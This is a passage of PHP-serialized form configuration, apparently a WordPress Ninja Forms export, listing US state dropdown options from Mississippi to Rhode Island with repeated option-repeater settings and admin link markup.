Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:24;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:11:\"Mississippi\";s:5:\"value\";s:2:\"MS\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"24\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:25;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Missouri\";s:5:\"value\";s:2:\"MO\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"25\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:26;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Montana\";s:5:\"value\";s:2:\"MT\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"26\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:27;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Nebraska\";s:5:\"value\";s:2:\"NE\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"27\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:28;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Nevada\";s:5:\"value\";s:2:\"NV\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"28\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:29;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"New Hampshire\";s:5:\"value\";s:2:\"NH\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"29\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:30;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"New Jersey\";s:5:\"value\";s:2:\"NJ\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"30\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:31;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"New Mexico\";s:5:\"value\";s:2:\"NM\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"31\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:32;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"New York\";s:5:\"value\";s:2:\"NY\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"32\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:33;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:14:\"North Carolina\";s:5:\"value\";s:2:\"NC\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"33\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:34;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:12:\"North Dakota\";s:5:\"value\";s:2:\"ND\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"34\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:35;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:4:\"Ohio\";s:5:\"value\";s:2:\"OH\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"35\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:36;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Oklahoma\";s:5:\"value\";s:2:\"OK\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"36\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:37;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Oregon\";s:5:\"value\";s:2:\"OR\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"37\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:38;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:12:\"Pennsylvania\";s:5:\"value\";s:2:\"PA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"38\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:39;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:12:\"Rhode Island\";s:5:\"value\";s:2:\"RI\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"39\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 